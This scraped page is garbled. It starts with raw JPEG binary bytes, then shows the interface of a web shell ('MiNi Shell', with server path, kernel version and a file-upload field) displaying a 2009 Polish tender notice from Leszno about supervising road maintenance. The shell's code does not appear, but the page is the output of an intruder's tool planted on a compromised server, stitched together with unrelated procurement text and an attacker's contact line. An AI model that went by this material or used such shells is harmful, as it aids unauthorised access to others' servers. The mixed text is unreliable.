JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/17080-N-2009.html

<p class="kh_header"><b>Leszno: Wykonywanie nadzoru inwestorskiego na robotach drogowych  związanych z bieżącym utrzymaniem nawierzchni dróg i ulic na terenie Miasta Leszna w latach 2009-2012</b><br>
<b>Numer ogłoszenia: 17080 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Leszna , ul. Karasia 15, 64-100 Leszno, woj. wielkopolskie, tel. 065 5298100, faks 065 5298131.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie nadzoru inwestorskiego na robotach drogowych  związanych z bieżącym utrzymaniem nawierzchni dróg i ulic na terenie Miasta Leszna w latach 2009-2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonywanie nadzoru  inwestorskiego na robotach drogowych związanych z bieżącym utrzymaniem nawierzchni dróg i ulic na terenie Miasta Leszna w okresie 36 miesięcy licząc od dnia podpisania umowy 
2.	Podstawowe obowiązki inspektora nadzoru inwestorskiego:
1)	sprawowanie kontroli technicznej utrzymania nawierzchni dróg i ulic dla których zarządcą jest Miejski Zarząd Dróg i Inwestycji a w szczególności w zakresie:
-	zimowego utrzymania dróg 
-	utrzymania nawierzchni gruntowych 
-	remontów cząstkowych nawierzchni bitumicznych 
-	remontów nawierzchni z prefabrykatów betonowych 
-	innych wyżej nie wymienionych prac związanych z bieżącym utrzymaniem dróg 
2)	Kontrola w imieniu zamawiającego robót drogowych związanych z utrzymaniem nawierzchni dróg i ulic w zakresie technicznej jakości a także ich zabezpieczenia, zgodności z przepisami bezpieczeństwa i higieny pracy, bezpieczeństwa pożarowego oraz kontroli właściwej jakości wbudowywanych materiałów, żądanie dostarczenie przez wykonawców robót wymaganych uzgodnień, atestów, świadectw dopuszczenia, protokółów badań i kontroli itp. oraz ich kompletowanie i przekazywanie zamawiającemu,
3)	Instruowanie wykonawców odnośnie technologii robót, technologii zabezpieczenia robót, ocena technicznej poprawności ich wykonania, kwalifikowania robót jako dodatkowych i zgłaszanie ich wystąpienia Zamawiającemu,
4)	Uczestnictwo w naradach roboczych , odbiorach robót, przeglądach w okresie biegu gwarancji i rękojmi,
5)	Obecność na placu budowy i kontrolowanie przebiegu robót w każdym dniu trwania prac,
6)	sprawdzanie i odbiór robót drogowych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych, naradach roboczych oraz przygotowanie i udział w czynnościach odbioru wykonanych robót drogowych. 
7)	Sprawdzanie wycen sporządzanych przez wykonawców robót drogowych, 
8)	Potwierdzanie w zakresie rzeczowym i finansowym wykonania nadzorowanych robót drogowych oraz usunięcia wad, 
9)	 współudział w przygotowaniu techniczno-organizacyjnym nadzorowanych robót drogowych do realizacji;
10)	Udzielanie na każde żądanie zamawiającego informacji o stanie realizacji robót.

4.	Obowiązki i uprawnienia inspektora nadzoru inwestorskiego określa ustawa z dnia 7 lipca 1994 r. Prawo budowlane ( tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118 ze zmianami). Ponadto wymaga się od osoby wyznaczonej na inspektora nadzoru codziennej dyspozycyjności na każde wezwanie zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca musi wnieść wadium w wysokości 1000,00 zł. słownie: jeden tysiąc złotych 00/100. 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6B ust. 5 pkt 2 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz.275).
3.	Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego  w Banku PKO BP S.A. 0/Leszno nr: 37 1020 3088 0000 8302 0005 7703  z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
4.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielonego przez Polską Agencję Rozwoju Przedsiębiorczości, należy wnieść poprzez złożenie oryginałów odpowiednich dokumentów w kasie Urzędu Miasta Leszna przy ul. Karasia 15 pok. nr 10. Kserokopię poświadczoną za zgodność z oryginałem oraz pokwitowaniem złożenia oryginału w kasie Urzędu Miasta Leszna, należy dołączyć do oferty.
5.	Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6.	Wadium musi być wniesione przed upływem terminu składania ofert. 
7.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
8.	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.	Zamawiający zwróci niezwłocznie wadium, jeżeli:
1)	upłynął terminu związania ofertą,
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
3)	Zamawiający unieważnił postępowanie o udzielenie niniejszego zamówienia publicznego, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
10.	Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy:
1)	który wycofał ofertę przed upływem terminu składania ofert,
2)	który został wykluczony z postępowania,
3)	którego oferta została odrzucona,
11.	Zamawiający zatrzyma wadium wraz z odsetkami , jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw , chyba że udowodni , że wynika to z przyczyn nie leżących po jego stronie. 
12.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
1)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniesie zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie       Wykonawcy.
13.	Wadium wniesione w pieniądzu, zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 ustawy),
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (art. 22 ust. 1 pkt 2 ustawy), tj.: osoba wyznaczona na inspektora nadzoru inwestorskiego powinna spełniać następujące warunki:
a/ posiadać uprawnienia budowlane bez ograniczeń lub w specjalności drogowej;
b/ być członkiem właściwej izby samorządu zawodowego;
c/ w trakcie realizacji zamówienia nie będzie zatrudniona w innej jednostce, poza podmiotem składającym ofertę, na podstawie umowy o pracę. 
d/ posiadać doświadczenie zawodowe w realizacji zadań o podobnym charakterze , tj. wykonywała min. 3 nadzory inwestorskie na robotach drogowych lub wykaże, że była kierownikiem budowy na min. 3 robotach drogowych. (Zamawiający uzna warunek za spełniony jeżeli wyznaczona osoba wykaże, że w ciągu ostatnich trzech lat sprawowała co najmniej 1 nadzór nad robotami drogowymi o zakresie podobnym do niniejszego zamówienia  lub wykaże, że była kierownikiem budowy na min. 3 robotach drogowych oraz przedłoży dokumenty potwierdzające należyte wykonanie powierzonych funkcji)

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art.22 ust.1 pkt 3 ustawy,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art.22 ust.1 pkt 4 ustawy),
5)	z chwilą złożenia oferty akceptują bez zastrzeżeń warunki przetargu określone w siwz,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta musi zawierać następujące oświadczenia Wykonawcy i dokumenty:
1)	wypełniony formularz ofertowy (wg załączonego do siwz druku),
2)	oświadczenie, że posiada uprawnienia do wykonywania działalności lub czynności niezbędnych do realizacji zamówienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 2 do siwz),
3)	oświadczenie, że posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (załącznik nr 2 do siwz),
4)	oświadczenie, ze znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (załącznik nr 2 do siwz),
5)	oświadczenie, że Wykonawca zapoznał się ze szczegółowymi warunkami przetargu zawartymi w niniejszej SIWZ oraz wzorem umowy i że akceptuje je bez zastrzeżeń (załącznik nr 3 do siwz),
6)	oświadczenie, że Wykonawca uważa się za związanego ofertą do terminu ważności oferty wskazanego w SIWZ i zobowiązuje się w przypadku wyboru jego oferty zawrzeć umowę (załącznik nr 3 do siwz),
7)	oświadczenie, że wykonawca posiada wszystkie informacje niezbędne do przygotowania oferty i znane są mu wymagania i przepisy w zakresie świadczeń objętych zamówieniem; (załącznik nr 3 do siwz),
8)	oświadczenie, że nadzór inwestorski będzie wykonywała osobiście osoba wskazana w ofercie oraz, że osoba ta w trakcie realizacji zamówienia nie będzie mogła być zatrudniona poza podmiotem wykonawcy składającego ofertę na podstawie umowy o pracę;  (załącznik nr 3 do siwz),
9)	oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (załącznik nr 2 do siwz),
10)	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewi?dencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upły?wem terminu składania ofert),
11)	dokumenty potwierdzające, że osoba wytypowana na Inspektora Nadzoru Inwestorskiego posiada wyma-gane uprawnienia do wykonywania nadzoru inwestorskiego oraz, że jest członkiem właściwej izby samorządu zawodowego;
12)	Wykaz doświadczeń zawodowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z  podaniem ich wartości, przedmiotu, daty wykonania i inwestora. Należy załączyć dokumenty potwierdzające, że zlecone czynności były wykonywane należycie. Wykaz ten powinien potwierdzać spełnianie przez Wykonawcę wymogu określonego w rozdz. 8 pkt 1.2.d. siwz
13)	wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wy?konania zamówienia, a także zakresu wykonywanych przez nich czynności. 
14)	polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.leszno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzba zamawiającego - pok. nr 30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2009 godzina 09:00, miejsce: siedzba zamawiającego - pok. nr 30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com